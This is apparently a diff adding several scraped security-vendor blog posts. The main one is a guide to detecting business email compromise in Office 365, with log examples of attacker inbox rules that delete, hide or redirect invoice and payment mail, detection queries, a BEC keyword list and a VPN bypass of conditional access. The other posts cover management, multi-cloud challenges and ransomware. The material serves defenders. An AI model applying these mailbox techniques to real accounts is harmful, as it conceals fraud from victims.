You\u2019ll probably notice that there\u2019s a theme to these often-used attacker techniques: the creation of new mail inbox rules. Why are we focusing so much on inbox rules? Because the attackers running these scams generally create inbox rules to hide evidence from their victims that the victim\u2019s mailbox is being used to perpetuate those clever BEC activities. The good news is that since attackers use this tactic so often, it creates a great detection opportunity, because there are only so many rules an attacker can create to cover his or her tracks. As you look for evidence of BEC attempts, you should be alerting on: 1. 
Inbox rules to automatically forward emails to any of the following folders: RSS subscriptions, junk email or notes During a recent investigation, we detected a threat actor creating an inbox rule to automatically forward emails containing \u201cWeTransfer\u201d in the email subject or body to the \u201cRSS subscriptions\u201d folder of the victim\u2019s mailbox. Log example: \"Operation\":\"New-InboxRule\", \"RecordType\":1, \"ResultStatus\":\"True\", \"UserType\":2, \"Version\":1, \"Workload\":\"Exchange\", \" { \"Name\":\"AlwaysDeleteOutlookRulesBlob\", \"Value\":\"False\" },{ \"Name\":\"Force\", \"Value\":\"False\" },{ \"Name\":\"MoveToFolder\", \"Value\":\"RSS Subscriptions\" },{ \"Name\":\"Name\", \"Value\":\"..\" },{ \"Name\":\"SubjectOrBodyContainsWords\", \"Value\":\"WeTransfer\" },{ \"Name\":\"MarkAsRead\", \"Value\":\"True\" },{ \"Name\":\"StopProcessingRules\", \"Value\":\"True\" }], Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND \"Name\":\"MoveToFolder\", \"Value\":\"RSS Subscriptions\"\" Expected false positive rate: Low (In our world, \u201clow\u201d means that you can enter this into an alert management workflow with minimal tuning work required.) 2. Inbox rules to automatically delete messages Similar to folder redirection, we\u2019ve detected threat actors creating new inbox rules to silently drop any emails that contained words like \u201cvirus,\u201d \u201chacked,\u201d \u201chack,\u201d \u201cspam\u201d or \u201crequest\u201d in the email subject or body. You can start by creating an alert for the creation of inbox rules to automatically delete messages with keywords, but we recommend alerting on any new inbox rule that\u2019s designed to automatically delete messages. Log example: \"Operation\":\"New-InboxRule\", \"Parameters\":[{ \"Name\":\"AlwaysDeleteOutlookRulesBlob\", \"Value\":\"False\" },{ \"Name\":\"Force\", \"Value\":\"False\" },{ \"Name\":\"SubjectOrBodyContainsWords\", \"Value\":\"virus;hacked;hack;spam;request\" },{ \"Name\":\"DeleteMessage\", \"Value\":\"True\" },{ \"Name\":\"MarkAsRead\", \"Value\":\"True\" },{ \"Name\":\"StopProcessingRules\", \"Value\":\"True\" }] Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND \"Name\":\"DeleteMessage\", \"Value\":\"True\"\" False positive rate: Low 3. Inbox rules to redirect messages to an external email address Using this technique, the message isn\u2019t delivered to the original recipients and no notification is sent to the sender or the original recipients. We\u2019ve detected threat actors creating inbox rules to redirect emails that contained words like \u201cstatement,\u201d \u201coutstanding,\u201d \u201cpast due,\u201d \u201cpayment,\u201d \u201cinvoice\u201d or \u201cwire\u201d to email accounts outside of the organization\u2019s domain (for example, a Gmail account). 
Log example: \"Operation\": \"New-InboxRule\", \"Parameters\": \"[rn {rn \"Name\": \"AlwaysDeleteOutlookRulesBlob\",rn \"Value\": \"False\"rn },rn {rn \"Name\": \"Force\",rn \"Value\": \"False\"rn },rn {rn \"Name\": \"RedirectTo\",rn \"Value\": \"@gmail.com\"rn },rn \"Name\": \"SubjectOrBodyContainsWords\",rn \"Value\": \"statement;outstanding;past due;payment;invoice;wire\"rn },rn {rn \"Name\": \"StopProcessingRules\",rn \"Value\": \"True\"rn }rn]\", Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND \"Name\":\"RedirectTo\"\" False positive rate: This alert is susceptible to false positives since it\u2019s not uncommon for users to forward work-related emails to a personal webmail account. If you\u2019ve integrated O365 with your SIEM, modify the query or rule set to alert and filter out known false positives. 4. Inbox rules that contain BEC keywords You\u2019re probably starting to see a theme emerge in these first three examples: using keywords to redirect emails. We\u2019ve detected threat actors by alerting anytime we see any inbox rule created using a value in our BEC keyword list. Here\u2019s a snippet of our own BEC keyword list to get you started: Virus Dropbox Password Fraud W2 Invoice Docusign Deposit Wire Tax Postmaster Utilpro Payroll Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND (\"wetransfer\" OR \"document\" OR \"invoice\" OR \"postmaster\") False positive rate: Low 5. New mailbox forwarding to an external address This technique doesn\u2019t involve inbox rules. Instead, it watches for wiley attackers who are configuring an external email address in the victim\u2019s account settings menu. While the setup is a bit different, the intent is the same: the attacker is trying to hide evidence from the victim that his or her mailbox is being used to perpetuate BEC fraud. Log example: \"Operation\":\"Set-Mailbox\",{\"Name\":\"ForwardingSmtpAddress\",\"Value\":\"smtp:\"},{\"Name\":\"DeliverToMailboxAndForward\",\"Value\":\"True\"}],\"application-action\":\"Set-Mailbox\",\"triggered-by\":{\"app-username\":\",\",\"privileges\":[{\"level\":\"admin\"}],\"new-values\":{\"additional-properties\":{\"DeliverToMailboxAndForward\":\"True\"},\"forward-to-address\":\"smtp:\" Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\" OR \"\"Set-Mailbox\"\") AND \"Name\":\"DeliverToMailboxAndForward\"\" False positive rate: This alert is also susceptible to false positives since it\u2019s not uncommon for users to forward work-related emails to a personal webmail account. If you\u2019ve integrated O365 with your SIEM, modify the query or rule set to alert and filter out known false positives. 6. New mailbox delegates This rule looks for threat actors that are gaining access to a victim\u2019s account through mailbox delegate access rights. Take a look at this example of a potential BEC threat we detected for one of our customers just last week that involved suspicious mailbox permissions: Log example: {\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"},{\"Name\":\"InheritanceType\",\"Value\":\"All\"}]\"application-action\":\"Add-MailboxPermission\",\"status\":{\"code\":\"Success\"} Sumo Logic query example: (\"Add-MailboxPermission\") AND \"Name\":\"AccessRights\"\" AND \"Value\":\"FullAccess\"\" False positive rate: This alert is also susceptible to false positives as it\u2019s not uncommon for organizations to enable access to the mailbox and calendar of high ranking employees to schedule meetings and travel. 
You\u2019ll need to tune this to your environment a bit. 7. Successful mailbox logins within minutes of denied logins due to conditional access policies Through O365 and Azure AD, you can implement conditional access policies to deny logins based on conditions like source country, source IP address or a sign-in risk score calculated on the backend by Microsoft. One very important detail: conditional access policies are enforced after the first-factor of authentication. Here\u2019s what it looks like in Expel Workbench: In the example above, O365 recorded a failed login from a foreign country due to a conditional access policy. Unfortunately, this can be bypassed using a virtual private network (VPN) service provider. Take a look at this example from a recent investigation where a threat actor circumvented conditional access policies by simply turning on their VPN. At 22:17:40 UTC, O365 logs recorded a login failure due to a conditional access policy set to deny authentications from a list of foreign countries. Minutes later at 22:22:40, O365 logs recorded a successful login to the same account from a popular virtual private network service provider. If you\u2019re sending O365 logs to your SIEM or have a way to implement time-based detections, fire an alert when O365 records a successful login within minutes of a failed login due to conditional access policies for the same account. Another option is to fire an alert when O365 records a successful login originating from a virtual private network service provider within minutes of a failed login due to conditional access policies for the same account. If you don\u2019t have an easy way to do this, start by reviewing alerts for failed logins due to any existing conditional access policies to get a better understanding of what\u2019s going on in your environment. You found a lead. Now what? If you identify something that doesn\u2019t look quite right, here are some investigative tips to help you chase down a potential lead into BEC activity: Identify the source of the activity Whether you\u2019re chasing down a suspicious mailbox Inbox rule or a usual email delegate, identify the source IP address associated with the successful authentication into the account when the activity in question occurred. Next, look up the additional information about the IP address, such as categorical and location information. This will allow you to understand if the IP address in question associated with an internet service provider (ISP) in your organization\u2019s geographic area or if the IP address in question is part of a VPN service provider range or located in another country based on GeoIP records. Review login activity for the user Next, review 30 days\u2019 worth of login activity for the user in question. This research will help you determine if the user typically logs in to O365 from the IP address in question. Also, review user-agent activity to understand typical operating system and browser combinations. If you\u2019re chasing something down that doesn\u2019t pass the smell test, do you suddenly see a login from an odd IP address using a version of Google Chrome running on Windows when the user normally logs in from a fixed ISP line using a version of Chrome on macOS? Establish a sense of what \u201cnormal\u201d looks like and watch out for deviations. We follow this same approach when pursuing leads into suspicious O365 activity in Expel Workbench where we can take advantage of automation to speed things up a bit. 
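If you don't have that kind of automation handy, you can approximate the review with a few lines of scripting. The sketch below assumes you've already exported roughly 30 days of the user's sign-in events (from your SIEM or the O365/Azure AD sign-in logs) into simple records — the field names and sample values are placeholders, not a real log schema. It just counts logins per IP/user-agent/country combination so the rare ones stand out against the user's normal pattern.

```python
from collections import Counter

# Simplified sketch: given ~30 days of sign-in events for one user, count
# logins per IP / user-agent / country combination. Field names and sample
# values are placeholders for whatever your log export actually contains.
events = [
    {"ip": "203.0.113.10", "user_agent": "Chrome 71 on macOS", "country": "US"},
    {"ip": "203.0.113.10", "user_agent": "Chrome 71 on macOS", "country": "US"},
    {"ip": "198.51.100.7", "user_agent": "Chrome 71 on Windows 10", "country": "NL"},
    # ... the rest of the 30-day export goes here
]

combos = Counter((e["ip"], e["user_agent"], e["country"]) for e in events)

print("logins  source")
for (ip, user_agent, country), count in combos.most_common():
    print(f"{count:>6}  {ip} | {user_agent} | {country}")
```

The combinations at the bottom of that list — a single login from a VPN range, or an OS/browser pairing the user never uses — are the ones worth chasing down.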
Take a look at this example where, with the help of some automation, we\u2019re able to quickly review 30 days of login activity based on IP address and user-agent combinations. Review mailbox activity for the user This is a really good step if your initial lead into possible BEC activity was something like a suspicious login to an account that originated from a VPN service provider. If you already have O365 mailbox auditing enabled , review mailbox activity for the user and be on the lookout for the threat actor techniques we mentioned above. Don\u2019t be afraid to review 30 days worth of mailbox activity. Does the user account in question typically delegate mailbox permissions or create inbox rules to help manage their email? Context matters. Review login activity for the IP address The next step is to review 30 days\u2019 worth of login activity for the IP address in question. Do you see successful authentications into multiple accounts from the IP address? Or do you only see activity into the user account in question? By reviewing login activity from the IP address in question, you\u2019re gaining greater context. This is also a valuable scoping action if the threat actor is accessing multiple accounts from the same IP address. Scope and pivot! Finally, through the investigative process you might establish new leads into BEC activity like a new external IP address used to authenticate into victim mailboxes or an inbox rule configured to silently drop any emails containing the word \u201cdocument.\u201d Make sure to pursue them to properly scope the activity. Let\u2019s say that through scoping you observed a BEC threat actor authenticate into a victim\u2019s mailbox from a popular VPN service provider. With this knowledge in hand, set out to answer how many other accounts the threat actor accessed from the VPN service provider. Here\u2019s another example: if you know the threat actor is creating inbox rules to silently drop messages, figure out if O365 logs recorded similar activity for any other account. And if you find new leads through that? Pursue them! How do I get started? To take advantage of the alerting opportunities based on the different scenarios we described above, here are a couple #protips to get started: Enable mailbox auditing in O365. Microsoft is in the process of enabling mailbox auditing by default across all its business users, but it doesn\u2019t hurt to double check that mailbox auditing within your organization is enabled. You\u2019ll gain visibility into mailbox login activity and actions typically performed in BEC attacks. Not sure how to enable mailbox auditing? Just follow these easy instructions. Integrate O365 with your SIEM. This step allows your team to centralize alerts coming from O365, integrating them into the same workflow you\u2019re already using. Here are step-by-step instructions on integrating O365 with your SIEM. Or we could totally just do all of this for you if you\u2019re looking for an \u201ceasy\u201d button. Have more questions about BEC? You can always drop us a note \u2014 we\u2019d love to chat." +} \ No newline at end of file diff --git a/so-long-2022-our-year-in-review.json b/so-long-2022-our-year-in-review.json new file mode 100644 index 0000000000000000000000000000000000000000..f40649e7659b5d9d67bfb4f83d3a3ce4a4bf246c --- /dev/null +++ b/so-long-2022-our-year-in-review.json @@ -0,0 +1,6 @@ +{ + "title": "So long, 2022! 
Our year in review", + "url": "https://expel.com/blog/so-long-2022-our-year-in-review/", + "date": "Dec 30, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG So long, 2022! Our year in review Engineering \u00b7 1 MIN READ \u00b7 ANDY RODGER \u00b7 DEC 30, 2022 \u00b7 TAGS: Careers / Cloud security / Company news / MDR / Tech tools We can hardly believe we\u2019re about to close the books on 2022 and ring in the new year. While we\u2019re hopeful and excited about what 2023 has in store for Expel, we can\u2019t help but reflect on the last 12 months, and warmly reminisce about all we accomplished. So to mark the end of one chapter and welcome the next, we\u2019ve curated some of our favorite blog posts over the last year to share with you, our loyal readers. Enjoy! Findings and predictions from our SOC Expel Quarterly Threat Report Q3: Top 5 takeaways Top 5 takeaways: Expel Quarterly Threat Report Q2 Expel Quarterly Threat Report: Cybersecurity data, trends, and recs from Q1 2022 Great eXpeltations 2022: Cybersecurity trends and predictions Incident reports and emerging threats Emerging Threats: Microsoft Exchange On-Prem Zero-Days Incident report: how a phishing campaign revealed BEC before exploitation Emerging Threat: BEC Payroll Fraud Advisory Incident report: Spotting an attacker in GCP Incident report: From CLI to console, chasing an attacker in AWS Getting to know us The Zen of cybersecurity culture Watch out EMEA\u2026here we come It\u2019s official: we\u2019re a Great Place to Work\u00ae A year in review: An honest look at a developer\u2019s first 12 months at Expel Let\u2019s talk compensation: Why Expel made the move to pay transparency Useful resources Touring the modern SOC: where are the dials and blinking lights? An Expel guide to Cybersecurity Awareness Month 2022 Detection and response in action: an end-to-end coverage story A defender\u2019s MITRE ATT&CK cheat sheet for Google Cloud Platform (GCP) Helpful tools for technical teams to collaborate without meetings Product information, updates, and improvements 45 minutes to one minute: how we shrunk image deployment time Understanding role-based access control in Kubernetes Remediation should be automated\u2014and customized How Expel\u2019s Alert Similarity feature helps our customers Cutting Through the Noise: RIOT Enrichment Drives SOC Clarity To get notifications when we publish new blog posts, go ahead and hit that green \u201cSubscribe\u201d button below. You\u2019ll be glad you did! Happy New Year!" +} \ No newline at end of file diff --git a/so-you-re-a-manager-congrats-now-what.json b/so-you-re-a-manager-congrats-now-what.json new file mode 100644 index 0000000000000000000000000000000000000000..d5fade4202e2d75cf1a17da5e76e9356712e25b6 --- /dev/null +++ b/so-you-re-a-manager-congrats-now-what.json @@ -0,0 +1,6 @@ +{ + "title": "So you're a manager. Congrats! Now what?", + "url": "https://expel.com/blog/youre-a-manager-now-what/", + "date": "Jul 14, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG So you\u2019re a manager. Congrats! Now what? Talent \u00b7 4 MIN READ \u00b7 LAURA KOEHNE \u00b7 JUL 14, 2020 \u00b7 TAGS: Career / Employee retention / Great place to work / How to / Management We\u2019ve all been there. Your boss tells you she thinks you\u2019re ready to manage a few people on the team. Hooray! You\u2019ve been waiting for this day for ages! But when all the congratulatory high-fives subside, there\u2019s just one problem: you have exactly zero tools in your toolbox to help you be a manager. 
Where do you even start? Management at Expel: our $0.02 This scenario happens far too often. You\u2019re deemed a manager and then thrown into the deep end of the management pool \u2026 with no life jacket. You\u2019re given no tips, tricks or resources to help you figure out how the heck to actually be a good manager. Plenty of us here at Expel experienced this scenario in our past professional lives. In the absence of real guidance from former managers and HR teams, we splashed along trying our best to figure out that whole management thing on our own. This is precisely why we decided to \u201cdo\u201d management differently at Expel, and approach the process of becoming a manager in a much more intentional and thoughtful manner. Here\u2019s the thing: if you do your job as a manager well, not only will you achieve results for the company, someone will hopefully remember you as a person who changed their life in ways they never expected. And you\u2019ll show them how to be a great manager for someone else. Remember that your efforts will have a positive ripple effect on others. If that doesn\u2019t make it worthwhile to be an intentional manager, I don\u2019t know what does. We feel great management is paramount to making the employee\u2019s journey as successful as possible. A managers\u2019 habits \u2013 the thousand little everyday decisions \u2013 are what matter most to employees. This is where culture becomes reality. So what\u2019s our $0.02 on management? Invest in training managers. We believe managers are critical in scaling culture \u2013 not only in the way we grow our business but in the way we keep Expel true to who we are. Three ways we\u2019re \u201cBUILDing\u201d great managers A few months ago, we kicked off a new program at Expel designed to \u201cBUILD\u201d great managers and give them the support they need to become the leaders that others remember fondly. We turned \u201cBUILD\u201d into an acronym, which became the name of this effort: Building Up Intentional Leaders Daily. And that\u2019s exactly what we ask of every manager at Expel, from a first timer to a seasoned execuwonk: be intentional about management. Commit to a habit of learning, practicing and getting better every day. We know people management is hard. Becoming a great manager isn\u2019t something that happens overnight \u2013 it\u2019s a lifelong journey. So we created a program to support each manager on the path, the Expel way. Our manager program is made of three components that provide opportunities for continued conversations and skills building. While becoming a manager at Expel isn\u2019t a linear path, here are experiences you can look forward to: First \u2026 The \u201cMaking of a Manager\u201d book club: A book club?! Yeah, a book club. But not the kind your grandma goes to with her bridge group. To start our 2020 program, we gave our people managers copies of The Making of a Manager by Julie Zhuo. Managers divided into groups to discuss what they took away from the book, reading a few chapters each week. Hearing what other leaders are doing in their teams and being honest with each other about what\u2019s working well (and what\u2019s not) was beneficial, and helped us all build connections across the org as we prepared to level up our management skills. After we finished the book, we were thrilled to have Julie Zhuo join us for a Zoom chat to answer all our questions and talk more about the ins and outs of management. 
Our whole company was invited because every Expletive needs to know what being a great manager looks like at Expel so that we can all hold our managers accountable and support them in this learning. Every new manager we promote or hire receives a manager box that includes a copy of The Making of a Manager . This book is foundational for our journey. Then \u2026 Monthly Manager Habits: At Expel we identified 12 manager habits that, when done well and consistently, help us become better managers, better coworkers and more aligned with our company values. Each month we collectively explore a single topic \u2013 an essential Expel manager habit \u2013 giving each other ideas on how to apply those habits with our own teams. We work on these skills independently every week, coming together in a two-hour online workshop mid-month to pressure test our learning. Servant leadership is a core tenet at Expel. All of our manager habits are understood through the lens of how they help us better serve others. So, new managers attend our Serve Others workshop as a gateway into the BUILD program. After attending the workshop, a new manager can jump into the next month\u2019s habit. Over the course of a year, they will build their skills and experiences in each of the 12 habits. Coupled with \u2026 Leadership coaching: Books and workshops are a solid start to building our collective management skills, but something we feel is important to our leaders is the opportunity to work directly with a leadership coach for more personalized advice. For a full year while in the BUILD program, each manager has unlimited 1:1 sessions with a BetterUp coach to discuss issues and goals they choose. These are the three core parts of our BUILD program \u2026 for now. It\u2019s important to be adaptable, especially in these uncertain times, and this design is by no means set in stone. We rely on feedback from our managers on what\u2019s useful and what else they\u2019re interested in learning. We believe dialogue is key. So as we move forward, we\u2019ll continue having conversations with our managers to ensure they get what they need to successfully BUILD great management skills. What have you found most helpful in your own management journey? We\u2019d love to hear ." +} \ No newline at end of file diff --git a/so-you-ve-got-a-multi-cloud-strategy-here-s-how-to-navigate.json b/so-you-ve-got-a-multi-cloud-strategy-here-s-how-to-navigate.json new file mode 100644 index 0000000000000000000000000000000000000000..09801b89771110d34ea1ab48d9827326e553217e --- /dev/null +++ b/so-you-ve-got-a-multi-cloud-strategy-here-s-how-to-navigate.json @@ -0,0 +1,6 @@ +{ + "title": "So you've got a multi-cloud strategy; here's how to navigate ...", + "url": "https://expel.com/blog/multi-cloud-strategy-four-security-challenges/", + "date": "Jun 25, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG So you\u2019ve got a multi-cloud strategy; here\u2019s how to navigate four five common security challenges Tips \u00b7 7 MIN READ \u00b7 ANDREW PRITCHETT, IAN COOPER AND BRANDON DOSSANTOS \u00b7 JAN 12, 2023 \u00b7 TAGS: Cloud security / Managed detection and response / Selecting tech / Tools This blog was originally posted on Jun 25, 2020 and was updated by Ian Cooper and Brandon Dossantos in January 2023 to include a fifth(!) cloud security challenge. I once attended a week-long training seminar on cloud security architecture. The audience included a few security engineers, security architects and a larger group of security administrators and CISOs. 
Our instructor kicked off the session with a few questions. First up: \u201cHow many of you are actively using a cloud platform at work?\u201d All but maybe two or three attendees raised their hands. He then asked how many were using Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP), respectively, and then polled the room for any other cloud platforms used. After each question, attendees quickly raised their hand in response. Then came: \u201cHow many of you are actively using two or more cloud platforms at work?\u201d Some of the cloud engineers\u2019 hands went up immediately, a few of the security architects slowly and apprehensively put their hands up, and I could tell that many of the security administrators were simply struggling to decide whether they should have a hand up or not. \u201cAh, don\u2019t worry about it,\u201d the instructor joked. \u201cIf your hand is not up yet, it will be the next time you\u2019re asked!\u201d Those with their hands in the air laughed knowingly. And the rest of the room dropped their foreheads toward the desks in front of them. So what\u2019s going on? How is it that some security administrators and CISOs don\u2019t know that they have data in several clouds? That\u2019s a whole other story. For most of us, going multi-cloud is inevitable. So let\u2019s talk about potential security challenges and how we\u2019ve helped our customers navigate them so far. Challenge #1: Skills and knowledge gap deficiencies Let\u2019s be honest: The technology market has a huge unmet demand for skills. This gap only increases when you require proficiency in cloud computing. You\u2019ll have an easier time finding a real, live unicorn than an unemployed person with proficiency in multiple cloud platforms. I try to keep some proficiency across multiple cloud environments but, admittedly, it\u2019s really tough. Especially, because cloud platforms are constantly changing and evolving. Trying to be proficient across multiple platforms is like a game of trying to hit fast moving targets. So what does this mean for your organization? Sometimes you\u2019ll have to make do with the resources you have. Try your best to provide folks with additional training where you can and be patient with your teams as they continually learn and grow in an evolving space. This also means that mistakes may happen. Requiring peer review on change requests is an excellent approach to reduce the likelihood of mistakes happening; however, this assumes that the individual doing the peer review can also identify the mistake. We often see policy changes that present risk to our customers \u2013 for example, granting the wrong roles for a storage bucket which exposes the content publicly. We\u2019ve witnessed this in AWS environments, and wrote a post all about keeping an eye out for open Amazon S3 buckets (and how to fix \u2018em) right here . The policy change is rarely directed from malice, but simply from the fact that the individual performing the action didn\u2019t understand the potential ramifications of their policy change. Challenge #2: Auditing differences across cloud providers Every CSP has a different schema for their audit logs. To a multi-cloud practitioner, combing through them can feel like reading a different language as you move from cloud environment to cloud environment. Not to mention that we haven\u2019t observed an audit to be \u201capples to apples\u201d across cloud platforms. 
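To make the "different language" problem concrete, here's a rough sketch of what normalizing audit events into a common shape can look like. The two sample records are heavily trimmed stand-ins for an AWS CloudTrail event and a GCP Admin Activity audit log entry (real events carry many more fields), mapped to a minimal who/what/when record.

```python
# Rough illustration of the schema mismatch: map a (heavily trimmed) AWS
# CloudTrail event and a GCP Admin Activity audit entry to one common shape.
cloudtrail_event = {
    "eventTime": "2020-06-25T15:04:05Z",
    "eventSource": "s3.amazonaws.com",
    "eventName": "PutBucketAcl",
    "userIdentity": {"arn": "arn:aws:iam::111122223333:user/example-user"},
}

gcp_admin_activity_entry = {
    "timestamp": "2020-06-25T15:04:05Z",
    "protoPayload": {
        "serviceName": "storage.googleapis.com",
        "methodName": "storage.setIamPermissions",
        "authenticationInfo": {"principalEmail": "example-user@example.com"},
    },
}

def normalize_cloudtrail(event):
    return {
        "when": event["eventTime"],
        "who": event["userIdentity"]["arn"],
        "what": f'{event["eventSource"]}:{event["eventName"]}',
    }

def normalize_gcp(entry):
    payload = entry["protoPayload"]
    return {
        "when": entry["timestamp"],
        "who": payload["authenticationInfo"]["principalEmail"],
        "what": f'{payload["serviceName"]}:{payload["methodName"]}',
    }

for record in (normalize_cloudtrail(cloudtrail_event), normalize_gcp(gcp_admin_activity_entry)):
    print(record)
```

Someone has to write and maintain that mapping for every service in every cloud you use — which is exactly the overhead multi-cloud teams tend to underestimate.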
We also found that auditing coverage is closely tied to the maturity of the service provided. As these products mature and more use cases are requested, I suspect we\u2019ll see improvement here. Audit logs are generally separated into groupings \u2013 administrative activity is generally grouped into one log source, while data access and system event activities each get their own. AWS has CloudTrail and CloudWatch while GCP has Admin Activity Logs and Data Access Logs. Exactly which activities land in which log stream differs slightly by definition from one cloud provider to the next. Also, what logs need to be enabled and configured by the consumer versus what needs to be enabled and configured by the cloud provider varies. Challenge #3: Loss of centralized management of users and role-based access control Say you started with one cloud platform and finally organized all of your users and groups, and got around to defining your policies for least privilege. You were just about to pat yourself on the back when your VP of Engineering tells you, \u201cHere\u2019s the link to our new cloud platform.\u201d The second cloud platform has a slightly different business use case, slightly different business requirements and user base. Now you have to manage identity and access management (IAM) in AWS and IAM in GCP. The services are similar but all of the role names are different and extend slightly different levels of privilege. You have Amazon Resource Names (ARNs) in AWS and member IDs in GCP as well as IAM inheritance in GCP and IAM with security groups in AWS. So you can\u2019t simply copy over your GCP IAM policy configuration to AWS. Role-based access control (RBAC) can become difficult. You must now remember, whenever you add, modify or remove privilege for a user in one environment, to also reflect that change in the other. Not to mention that while you\u2019re trying to figure this out, you have engineers going around with company credit cards adding new services and standing up new infrastructure in both environments. Challenge #4: Data overload on security teams CloudTrail Logs, Data Access Logs and virtual private cloud (VPC) flow logs; oh my! Literally trillions of logs are now being generated across your multiple cloud environments! In an average three-day period, Expel generates about 88 million log events in our GCP environment, not including VPC or System Event Logs. The big question we hear from prospects is, \u201cI get a ton of cloud audit logs, way more than we\u2019d ever have time to review. What do I actually need to care about?\u201d The other question is, \u201cWhat do I do with all of these logs?\u201d Ultimately, after all of the work and cost involved in getting all of your logs into a centralized location or SIEM, your team is still drowning in audit logs with multiple schemas and wondering: what actually matters? We even published a post about generating strong security leads from Amazon CloudTrail through a SIEM. Challenge #5: Building a detection strategy based on security incident reports from the wild It can be challenging to find security incident reports in the wild, especially with Azure and GCP. Discussions of security in the cloud versus security of the cloud come to mind when reflecting on famous cases like the Capital One breach. To build a strong detection strategy, we need to review past incidents involving security in the cloud (AKA, things that you can actually control).
Protecting partners with a variety of cloud infrastructure has given our team a lot of experience in such incidents: AWS \u2013 For AWS incidents, we have a variety to choose from. The most popular cloud hosting platform naturally sees the most action. Read about how our SOC investigated privilege escalation from an attacker armed with long term access keys here . Azure \u2013 Across all cloud platforms, we see a lot of attempts to deploy generic coin miners. Sometimes the initial lead can appear quite spooky, with analysts ready to respond to hands-on keyboard attackers only to discover that a scanner for vulnerable resources has dropped a generic coinminer. Sometimes, our team actually gets more value out of a simulated attack in the cloud. One red team landed on an Azure VM, and then moved laterally via PostGresql. Communicating with the customer after confirming it was a test- our analysts continued to investigate and observed the red team\u2019s efforts in real time. GCP \u2013 Not many in-house security teams will have a history of security incidents in GCP to review and use to improve defenses. In one interesting GCP incident, the attacker grabbed a GCP service account key that was committed to a public github repo. Upon acquiring exposed credentials, the attacker attempted to create a new service account key and enable it to maintain persistent access to the customer\u2019s GCP environment. The attacker attempted to escalate privileges and move laterally using various features with the gcloud cli and SDK. With multiple alarm bells ringing, the SOC jumped in to help the customer remediate and become more resilient to similar attacks in the future. Incidents like these are a gold mine for our team to review attacker behaviors and continue to build upon our detection strategies in the cloud. With a growing arsenal of in-house cloud detections, Detection & Response engineering at Expel greatly values the incident retro process \u2013 we work hard to absorb the lessons learned when incidents happen, and analyze every step of the attacker\u2019s process to hunt for detection gaps. How your third-party security partner should help If you run in multiple CSPs and work with a third-party managed security partner, there are three key ways that provider should be supporting you: Reduce complexity and hopefully costs as well; Provide centralized security management for your decentralized clouds; and Provide you with alerts and answers about what\u2019s happening in your environments. It\u2019s reasonable to assume that, even if you do have an in-house SOC, not everyone will have expertise in every CSP. Third-party security partners can help you bridge knowledge gaps. It takes a team that continuously applies their learnings to better understand what normal should look like in each security environment. They also need to understand what types of actions can increase risk to your organization and provide you with recommendations to make your organization more resilient in the cloud. But understanding these nuances doesn\u2019t happen overnight. This is an area for where a third-party security partner can jump in to boost your expertise. So how do we help our customers here at Expel? We\u2019re lucky to have analysts working around the clock who are experienced in investigating security incidents in the cloud. Each investigation helps them gain a depth of knowledge in specific cloud platforms as well as our customers\u2019 unique environments. 
As a result, our analysts know where to look and what to look for. They not only pull out the important events from the mountain of cloud security signals but also provide meaningful answers to alerts. Additionally, our detection and response engineers are constantly researching new attack theories, policy changes which present risk to our customers\u2019 organizations and newly added cloud platform services to always keep cloud alerts up to date and relevant. We monitor cloud security signals and provide customers with a centralized location for all cloud security alerting and investigation. This is the part where you can finally exhale. We get it \u2013 this is overwhelming. But don\u2019t worry. Remember that there are solutions to this tricky security challenge. Want to talk to a human about how we can help you out? Contact us ." +} \ No newline at end of file diff --git a/someone-in-your-industry-got-hit-with-ransomware-what.json b/someone-in-your-industry-got-hit-with-ransomware-what.json new file mode 100644 index 0000000000000000000000000000000000000000..9bd5fbb1c6a7116ca8c14c8af0f11d2db27e3688 --- /dev/null +++ b/someone-in-your-industry-got-hit-with-ransomware-what.json @@ -0,0 +1,6 @@ +{ + "title": "Someone in your industry got hit with ransomware. What ...", + "url": "https://expel.com/blog/someone-in-your-industry-got-hit-with-ransomware-what-now/", + "date": "Jun 3, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Someone in your industry got hit with ransomware. What now? Security operations \u00b7 4 MIN READ \u00b7 TYLER FORNES \u00b7 JUN 3, 2021 \u00b7 TAGS: MDR / Tech tools The hits (and headlines) just keep coming. It seems like every week there\u2019s a new story about an organization that\u2019s become the latest victim of a ransomware attack. When ransomware strikes someone else in your industry, you can\u2019t help but think, \u201cThis could\u2019ve just as easily happened to us.\u201d Looking across our customer base, 12 percent of the incidents we detected by the Expel Security Operations Center (SOC) in April 2021 had the potential to become a ransomware event. These incidents didn\u2019t result in a ransomware event because we stopped them early in the attack lifecycle. The prospect of a ransomware attack is scary. But the good news is that there are plenty of precautions you can take to make your org as secure as possible and resilient against ransomware. Targeted versus opportunistic ransomware: What\u2019s the difference? Whether a sophisticated targeted attack, or a tried and true tactic that dupes users, you should be on the lookout for these two types of ransomware attacks: Opportunistic attacks Unlike targeted attacks, which spend time lurking in an environment for weaknesses, opportunistic attacks prey on orgs that are most likely to not have a strong security posture. These attacks are used to make a quick buck and use cheap tactics like phishing or scanning for and exploiting common public facing vulnerabilities. The difference? A much shorter time to ransom. Once their random attack succeeds, the infection begins and typically spreads very quickly. Similar to targeted attacks, once infected, orgs are forced to exchange money to retrieve their data We\u2019ve also seen an increase in opportunistic attacks in recent years and our SOC responded to several opportunistic incidents where an actor scanned the internet for remote access services \u2013 like Remote Desktop Protocol (RDP) \u2013 that are exposed to the internet. 
